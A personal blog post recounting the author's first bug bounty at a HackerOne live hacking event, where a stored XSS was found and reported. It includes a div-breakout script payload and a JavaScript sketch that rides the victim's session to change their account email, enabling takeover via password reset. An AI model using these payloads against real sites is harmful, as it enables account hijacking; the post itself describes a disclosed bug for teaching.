hon.dev

First bug bounty report

July 30, 2019

Back in August 2018, @nemessisc and I met at a web application security workshop. A few months later we reconnected and she invited me to be her +1 for H1-415, a HackerOne live hacking event!

h1-415 challenge coin

Photo cred: Nemesis

I never really did bug bounty but had some experience doing pentest-ish type things. I took an amazing security course in college and went to BSides in my hometown. I had also recently worked on xsspay, an intentionally vulnerable web app for teaching the other software engineers at my previous company the basics of XSS.

To shill xsspay for a second, it’s a fake bank sort of app where you have $$$ and can pay/request money from other users. I explained the three major types of XSS in the presentation and then served the project afterwards so the attendees could try to steal money from each other with their own XSS payloads.

Anyways back to the original topic, a bug bounty live hacking event! A little bit of a rundown on how these work:

  • You get invited to the event, maybe sign an NDA, and join a Slack group.
  • Eventually you hop on a scope call video where you learn the targets.
  • You search for bugs before the event and submit them during the presubmission window. During presubmission, any bug marked as a dupe gets its payout split among everyone who submitted it.
  • You go to the event and search for more bugs.

So knowing XSS decently well, I decided that was the type of vulnerability I was going to look for. In the scope call, the company revealed a brand new un-bug-bountied asset, and I decided to go over that since I thought it would be less combed over.

With all that in mind, my less-than-thought-out “plan” was to put payloads EVERYWHERE and see if anything suspicious turned up. Lucky for me, something suspicious did.

In most places where I entered text, the app would store it and display the same text back. Say I changed my name to <script>alert(0)</script>: it would show up exactly like that in the user interface. In one place it didn’t, though; there was some weird kind of sanitization going on. I inspected the elements to see what was happening in the DOM and changed my payload so that it would escape out. For example:

// DOM
<div>Your text: {your_text}</div>

// PAYLOAD
your_text = </div><script>alert(0)</script><div>

That’s a super contrived example and the actual payload was a little more complicated but it follows the same principle. So now I have stored XSS, nice.

I told @d0nutptr and he offered to help with writing the report. His big piece of advice was to demonstrate what kind of impact the bug has and why the company should care.

The vulnerable part of the site could be either public or private, so I could have arbitrary code execute in another user’s session if that user visited the public page where the payload was waiting. I poked around in the UI some more and ended up looking into the account settings and password reset flow.

Turns out changing an account email didn’t require confirmation, and a password reset only required the account email. I crafted my payload so that when a user visited the vulnerable page, a request was made to change their email to mine. Afterwards I could go through the password reset process, and all of a sudden I owned the victim’s account. Extra nice. 😎
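The takeover step boils down to something like the sketch below. This is a minimal, hypothetical version: the endpoint path, field names, and helper function are all assumptions for illustration, not the target’s real API. The key idea is that when the victim’s browser runs the stored payload, their own session cookies authenticate the email-change request.

```javascript
// Hypothetical sketch of the account-takeover payload.
// The "/api/account/email" endpoint and its JSON body are assumptions;
// the real target's API looked different.

// Build the email-change request the stored XSS payload would fire.
function buildEmailChangeRequest(attackerEmail) {
  return {
    url: "/api/account/email", // hypothetical endpoint
    options: {
      method: "POST",
      credentials: "include", // ride the victim's logged-in session
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ email: attackerEmail }),
    },
  };
}

// Inside the stored payload this becomes a single fire-and-forget call:
//   const req = buildEmailChangeRequest("attacker@example.com");
//   fetch(req.url, req.options);
// After that, a normal password reset to the attacker's email
// hands over the account.
```

The `credentials: "include"` bit is what makes this work from the victim’s session; the payload never needs to steal the cookie itself, it just spends it.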

In summary, I found stored XSS that could take over another user’s account, provided the user visits the page where the payload is stored.

I submitted the bug…and it was a dupe! Luckily I submitted it during the presubmission period, so the payout got split between all the hackers who reported it. The bug itself was worth $500, split between 4 people ($125 each). Not bad for a first time. 🎉

Hon Kwok